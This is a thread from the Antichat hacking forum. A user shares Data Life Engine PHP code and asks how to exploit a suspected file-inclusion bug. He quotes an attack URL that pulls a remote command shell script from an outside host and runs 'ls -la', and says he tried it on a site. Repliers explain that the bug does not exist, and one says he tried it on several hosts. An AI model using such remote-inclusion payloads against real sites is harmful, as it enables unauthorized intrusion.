Форум АНТИЧАТ - Inlcude Protection In Data Life Engine

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Inlcude Protection In Data Life Engine (https://forum.antichat.xyz/showthread.php?t=32016)

Inlcude Protection In Data Life Engine

nu prastite za moi plaxoi ruski no kak magu tak i gavariu :)
mne problema s skriptam data life engine
tam est takoi skript

PHP код:


		
			
<?if(!defined('DATALIFEENGINE'))

{

  die("Hacking attempt!");

}



if (isset ($_REQUEST['do'])) $do = $_REQUEST['do']; else $do = "";

if (isset ($_REQUEST['subaction'])) $subaction = $_REQUEST['subaction']; else $subaction = "";

if (isset ($_REQUEST['doaction'])) $doaction = $_REQUEST['doaction']; else $doaction = "";



if ($cstart < 0) $cstart = 0;

$CN_HALT = FALSE;



switch ($do) {



    case "search" :

        include ENGINE_DIR.'/modules/search.php';

        break;



    case "comments" :

        include ENGINE_DIR.'/modules/comments.php';

        break;



    case "stats" :

        include ENGINE_DIR.'/modules/stats.php';

        break;

?>

i i padumal shto sdes srabotait include bug
i posle
www.site.ru/engine/engine.php?http://hackscripts.by.ru/cmd.txt?&cmd=ls%20-la
zavoda comandi ano napisal "hack attempt !'
srabotal chast skripta

PHP код:


		
			
<?if(!defined('DATALIFEENGINE'))

{

  die("Hacking attempt!");

}

shto mojna sdelat ? ktonibud znait ? :mad:

Где ты тут инклуд баг в коде увидел ?)

Engine_dir определен в конфиге =)

Цитата:

Сообщение от blackybr

'Где ты тут инклуд баг в коде увидел ?)'

Наверно вот эта строка include ENGINE_DIR.'/modules/stats.php' :D
Попался как-то в руки так и не получилось на трех хостах пробовал.

Я же написал - Engine_dir глобальная переменная, определяется в конфиге.. если вы конечно както удалите конфиг..)))

реально зашел на какой-то сайт, там эта строка...Hacking attempt! хек непохек)